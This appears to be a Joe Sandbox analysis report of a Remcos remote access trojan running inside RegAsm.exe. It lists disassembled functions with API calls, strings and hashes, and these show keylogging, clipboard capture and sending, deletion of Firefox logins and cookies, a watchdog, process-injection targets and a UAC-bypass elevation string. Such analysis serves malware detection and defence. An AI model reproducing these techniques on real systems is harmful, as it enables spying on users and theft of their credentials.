                                                                • Opcode Fuzzy Hash: b2d82c10f2debf51222373f7a3e4651be4bb46aebb09b74c8cfb6043f73c9cfb
                                                                • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                                • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                • API String ID: 3018269243-13974260
                                                                • Opcode ID: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                                • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                • Opcode Fuzzy Hash: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                                • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                • API String ID: 1164774033-3681987949
                                                                • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 004168FD
                                                                • EmptyClipboard.USER32 ref: 0041690B
                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                • CloseClipboard.USER32 ref: 00416990
                                                                • OpenClipboard.USER32 ref: 00416997
                                                                • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                • String ID: !D@
                                                                • API String ID: 3520204547-604454484
                                                                • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$Close$File$FirstNext
                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                • API String ID: 3527384056-432212279
                                                                • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                Function 0041330D Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                • String ID:
                                                                • API String ID: 297527592-0
                                                                • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                Function 0040F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                • API String ID: 3756808967-1743721670
                                                                • Opcode ID: 5b42a80951eb342c4a971769a7958462a684e848444859b94199bc40bd9fc38b
                                                                • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                • Opcode Fuzzy Hash: 5b42a80951eb342c4a971769a7958462a684e848444859b94199bc40bd9fc38b
                                                                • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0$1$2$3$4$5$6$7$VG
                                                                • API String ID: 0-1861860590
                                                                • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0040755C
                                                                • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Object_wcslen
                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                • API String ID: 240030777-3166923314
                                                                • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                • GetLastError.KERNEL32 ref: 0041A84C
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                • String ID:
                                                                • API String ID: 3587775597-0
                                                                • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                • String ID: JD$JD$JD
                                                                • API String ID: 745075371-3517165026
                                                                • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                • API String ID: 1164774033-405221262
                                                                • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                                • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                                • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                • String ID:
                                                                • API String ID: 2341273852-0
                                                                • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Find$CreateFirstNext
                                                                • String ID: 8SG$PXG$PXG$NG$PG
                                                                • API String ID: 341183262-3812160132
                                                                • Opcode ID: 8686161ca2437f15ec34d8a1a2640ae3a169738a9e5f3fbc3809040c5888124a
                                                                • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                • Opcode Fuzzy Hash: 8686161ca2437f15ec34d8a1a2640ae3a169738a9e5f3fbc3809040c5888124a
                                                                • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                • GetKeyState.USER32(00000010), ref: 0040A46E
                                                                • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                                • ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                • String ID:
                                                                • API String ID: 1888522110-0
                                                                • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                • API String ID: 2127411465-314212984
                                                                • Opcode ID: 5848efdac69bfd9794d643e9833e62266757dcd20aadc8ba97a8731b3b6f1af5
                                                                • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                • Opcode Fuzzy Hash: 5848efdac69bfd9794d643e9833e62266757dcd20aadc8ba97a8731b3b6f1af5
                                                                • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 00449292
                                                                • _free.LIBCMT ref: 004492B6
                                                                • _free.LIBCMT ref: 0044943D
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                • _free.LIBCMT ref: 00449609
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
